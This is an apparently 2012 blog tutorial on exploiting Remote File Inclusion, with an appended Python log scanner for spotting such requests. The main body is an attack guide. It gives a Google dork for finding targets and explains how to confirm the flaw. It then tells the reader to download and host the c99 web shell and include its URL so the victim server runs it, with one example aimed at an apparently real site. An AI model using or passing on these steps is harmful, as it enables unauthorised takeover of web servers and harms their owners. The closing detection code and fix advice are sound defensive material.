Thursday 20 December 2012

RFI Tutorial


Remote File Inclusion (RFI) is the most common vulnerability found in many web servers. If the remote file is executed successfully, we gain control over the server and can make it execute any command we wish. So how exactly can we do that?

First we need to find websites that are vulnerable to this, using the following Google dork:

“inurl:index.php?page=”

We get a number of websites listed, of the form:

www.Targetsite.com/index.php?page=Anything

One by one, in place of "Anything", type http://www.google.com, as shown below:

http://www.Targetsite.com/index.php?...www.google.com

If the above link opens the Google homepage, it implies that the website is completely vulnerable to Remote File Inclusion.

The next step is to download one of the several shells available on the web; a shell is nothing but a payload written in PHP. The most common are c99 and r57. The c99 shell can be downloaded from

http://www.4shared.com/file/10793057...tml?aff=763782

Upload the shell to a web hosting site such as ripway.com, 110mb.com, etc. You then get a link to the shell such as:

http://h1.ripway.com/abhi/c99.txt

or something similar, depending on the site on which the shell is hosted.

The Google homepage was successfully loaded through http://www.Targetsite.com/index.php?...www.google.com as I mentioned earlier, right? Now just remove the Google part and paste the link to your shell, as shown:

http://www.cbspk.com/v2/index.php?pa.../abhi/c99.txt?

Remember, the ‘?’ at the end is important; without it the shell will not execute. Try this out and you get complete control panel access to the web server. Quite easy and very interesting.
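Seen from the server side, the requests described above leave a clear trace in the access log: an include-style parameter such as `page` whose value is a full URL instead of a local page name. The following is an added example, not part of the original post, that scans log lines for that pattern; the parameter list, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Include-style parameter names to watch (assumed list; tune it per application).
INCLUDE_PARAMS = {"page", "file", "include", "inc", "path", "template"}
# A value starting with scheme:// or // is a URL, not a local page name.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.IGNORECASE)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def remote_include_params(target):
    """Return [(param, value)] where an include-style parameter holds a URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded values
        if name.lower() in INCLUDE_PARAMS and REMOTE_VALUE.match(value):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Return [(client_ip, param, value)] for every suspicious request."""
    findings = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        for name, value in remote_include_params(m.group(1)):
            findings.append((client, name, value))
    return findings


# Constructed sample log lines (documentation IP ranges, example domains).
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Dec/2012:10:01:02 +0000] "GET /index.php?page=contact HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Dec/2012:10:02:10 +0000] "GET /index.php?page=http://www.example.org HTTP/1.1" 200 9876',
    '203.0.113.9 - - [20/Dec/2012:10:03:44 +0000] "GET /index.php?page=http%3A%2F%2Ffiles.example.net%2Fnotes.txt%3F HTTP/1.1" 200 733',
    '198.51.100.7 - - [20/Dec/2012:10:05:00 +0000] "GET /index.php?page=about&ref=http://search.example.org/ HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for client, name, value in scan(SAMPLE_LOG):
        print(f"{client} {name}={value}")
```

Detection complements the fix rather than replacing it: map the `page` value to a fixed allowlist of local files and keep PHP's `allow_url_include` setting disabled.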
